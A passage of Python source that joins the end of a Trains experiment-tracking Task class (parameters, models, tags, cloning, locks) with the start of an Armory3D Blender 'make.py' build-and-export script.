task_id=self.id,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self._reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self._reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
# type: (bool) -> ()
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
# type: (bool, Optional[str], Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('mode_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
# type: (str, Optional[str], Optional[str], Optional[Sequence[str]]) -> ()
"""
Update the Task's output model. Use this method to update the output model when you have a local model URI,
for example, storing the weights file locally, and specifying a ``file://path/to/file`` URI)
.. important::
This method only updates the model's metadata using the API. It does not upload any data.
:param model_uri: The URI of the updated model weights file.
:type model_uri: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(model_uri, self.id, name, comment, tags)
def update_output_model_and_upload(
self,
model_file, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
async_enable=False, # type: bool
cb=None, # type: Optional[Callable[[Optional[bool]], bool]]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, Trains uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then Trains updates the model object associated with the Task an API call. The API call uses with the URI
of the uploaded file, and other values provided by additional arguments.
:param str model_file: The path to the updated model weights file.
:param str name: The updated model name. (Optional)
:param str comment: The updated model description. (Optional)
:param list tags: The updated model tags. (Optional)
:param bool async_enable: Request asynchronous upload?
- ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread.
- ``False`` - The API call blocks until the upload completes, and the API call updating the model returns.
(default)
:param callable cb: Asynchronous callback. A callback. If ``async_enable`` is set to ``True``,
this is a callback that is invoked once the asynchronous upload and update complete.
:param int iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``,
this is the expected URI, as the upload is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
def _conditionally_start_task(self):
# type: () -> ()
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
# type: (str, Optional[str], bool, bool) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **Trains Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name. The name is used to locate an existing model in the **Trains Server**
(backend). If ``model_id`` is not specified, then ``model_name`` must be specified.
:param update_task_design: Update the Task's design?
- ``True`` - Trains copies the Task's model design from the input model.
- ``False`` - Trains does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration?
- ``True`` - Trains copies the Task's label enumeration from the input model.
- ``False`` - Trains does not copy the Task's label enumeration from the input model.
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
self.reload()
# store model id
self.data.execution.model = model_id
# Auto populate input field from model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
update = kwargs.pop('__update', False)
with self._edit_lock:
self.reload()
if update:
parameters = self.get_parameters()
else:
parameters = dict()
parameters.update(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
parameters.update(kwargs)
not_allowed = {
k: type(v).__name__
for k, v in parameters.items()
if not isinstance(v, self._parameters_allowed_types)
}
if not_allowed:
raise ValueError(
"Only builtin types ({}) are allowed for values (got {})".format(
', '.join(t.__name__ for t in self._parameters_allowed_types),
', '.join('%s=>%s' % p for p in not_allowed.items())),
)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: str(v) if v is not None else "" for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(parameters=parameters)
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None):
# type: (str, str, Optional[str]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
.. note::
The ``description`` is not yet in use.
"""
# not supported yet
if description:
# noinspection PyUnusedLocal
description = None
self.set_parameters({name: value}, __update=True)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self.set_parameters(__update=True, *args, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
# type: (str) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by trains-agent to execute this experiment
inside the provided docker image.
"""
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> ()
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts to [tasks.Artifacts]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as blob of text.
:return: The model configuration as blob of text.
"""
design = self._get_task_property("execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
# type: (str) -> ()
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id):
# type: (str) -> ()
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.parent
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
..code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return The task status without refreshing the entire Task object object (only the status property)
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.trains.allegro.ai/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars.
With sample limit, average scalar values inside sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(task=self.id, key=x_axis, samples=max(0, max_samples))
)
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
res = self.send(
events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports,)
)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``trains-agent`` is not executing it)?
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> ()
"""
Force the adding of a package to the requirements list. If ``package_version`` is not specified, use the
installed package version, if found.
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
cls._force_requirements[package_name] = package_version
def _get_models(self, model_type='output'):
# type: (str) -> Sequence[Model]
# model_type is either 'output' or 'input'
model_type = model_type.lower().strip()
assert model_type == 'output' or model_type == 'input'
if model_type == 'input':
regex = r'((?i)(Using model id: )(\w+)?)'
compiled = re.compile(regex)
ids = [i[-1] for i in re.findall(compiled, self.comment)] + (
[self.input_model_id] if self.input_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
in_model = []
for i in ids:
m = TrainsModel(model_id=i)
# noinspection PyBroadException
try:
# make sure the model is is valid
# noinspection PyProtectedMember
m._get_model_data()
in_model.append(m)
except Exception:
pass
return in_model
else:
res = self.send(
models.GetAllRequest(
task=[self.id],
order_by=['created'],
only_fields=['id']
)
)
if not res.response.models:
return []
ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
return [TrainsModel(model_id=i) for i in ids]
def _get_default_report_storage_uri(self):
# type: () -> str
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
# Since we ae using forced update, make sure he task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
# noinspection PyBroadException
try:
self.data.script.requirements = requirements
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
self.data.script = script
self._edit(script=script)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new tasks's ID.
"""
session = session if session else cls._get_default_session()
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: bash
status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
def _get_all_events(self, max_events=100):
# type: (int) -> Any
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:return: A list of events from the task.
"""
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
))
events_list = log_events.response.events
total_events = log_events.response.total
scroll = log_events.response.scroll_id
while len(events_list) < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
scroll_id=scroll,
))
events_list.extend(log_events.response.events)
scroll = log_events.response.scroll_id
return events_list
@property
def _edit_lock(self):
# type: () -> ()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
# remove previous file lock instance, just in case.
filename = os.path.join(gettempdir(), 'trains_{}.lock'.format(self.id))
# noinspection PyBroadException
try:
os.unlink(filename)
except Exception:
pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Union[str, Task]) -> ()
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[1]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
code_parsed = False
profile_time = 0
def compile_shader_pass(res, raw_shaders_path, shader_name, defs):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path, is_play=False, is_publish=False, in_viewport=False):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_shaders == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
# Detect camera plane changes
if len(bpy.data.cameras) > 0:
cam = bpy.data.cameras[0]
if state.last_clip_start == 0:
state.last_clip_start = cam.clip_start
state.last_clip_end = cam.clip_end
elif cam.clip_start != state.last_clip_start or cam.clip_end != state.last_clip_end:
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
state.last_clip_start = cam.clip_start
state.last_clip_end = cam.clip_end
raw_shaders_path = sdk_path + 'armory/Shaders/'
assets_path = sdk_path + 'armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = is_publish and wrd.arm_asset_compression
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.zip' if (scene.arm_compress and is_publish) else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
